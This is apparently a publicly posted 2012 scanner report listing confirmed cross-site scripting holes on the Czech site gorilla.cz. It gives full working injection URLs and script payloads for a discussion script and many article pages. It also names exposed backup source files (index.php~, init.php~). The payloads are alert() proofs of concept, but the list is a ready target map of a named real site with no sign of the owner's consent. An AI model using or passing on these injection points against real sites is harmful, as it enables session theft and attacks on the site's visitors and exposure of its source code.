sroub3k

gorilla.cz

Sep 28th, 2012
XSS (Cross-site Scripting)

Severity: Important
Confirmation: Confirmed
URL: http://www.gorilla.cz/disc_tree.php?unid='"--></style></script><script>alert(0x0000BC)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: unid
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x0000BC)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.gorilla.cz/disc_input.php
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: msg_id
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x00027D)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.gorilla.cz/article/'"--></style></script><script>alert(0x000066)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: '"--></style></script><script>alert(0x000066)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.gorilla.cz/article/878-gorilla-ma-rss.html'"--></style></script><script>alert(0x000067)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: '"--></style></script><script>alert(0x000067)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.gorilla.cz/article/12348-trailer-paranormal-activity-4-je-to-tu-zase.html'"--></style></script><script>alert(0x0000AA)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: '"--></style></script><script>alert(0x0000AA)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.gorilla.cz/article/12347-trailer-gambit-cameron-diaz-a-colin-firth-ve-filmu-brat-coen.html'"--></style></script><script>alert(0x0000AE)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: '"--></style></script><script>alert(0x0000AE)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.gorilla.cz/article/12346-blb-a-blbjs-jak-se-bude-jmenovat-pokraovn-.html'"--></style></script><script>alert(0x0000F4)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: '"--></style></script><script>alert(0x0000F4)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.gorilla.cz/article/12345-voice-us-3-6-dl-u-to-zan-nudit.html'"--></style></script><script>alert(0x0000F2)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: '"--></style></script><script>alert(0x0000F2)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.gorilla.cz/article/12340-velk-test-novch-seril-20122013-partners.html'"--></style></script><script>alert(0x0000E6)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: '"--></style></script><script>alert(0x0000E6)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.gorilla.cz/article/12341-recept-na-bohatstv-5-dl-koalka-a-prance.html'"--></style></script><script>alert(0x000100)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: '"--></style></script><script>alert(0x000100)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.gorilla.cz/article/12338-lost-angels-i-andl-se-mohou-ztratit.html'"--></style></script><script>alert(0x000107)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: '"--></style></script><script>alert(0x000107)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.gorilla.cz/article/12344-lore-dwayne-johnson-jako-lovec-netvor-v-reii-barryho-sonnenfelda.html'"--></style></script><script>alert(0x00010B)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: '"--></style></script><script>alert(0x00010B)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.gorilla.cz/disc_input.php
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: unid
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x0002F3)</script>

||| Backup Source Code Found

Severity: Important
Confirmation: Confirmed
URL: http://www.gorilla.cz/index.php~
Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425

Severity: Important
Confirmation: Confirmed
URL: http://www.gorilla.cz/init.php~
Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425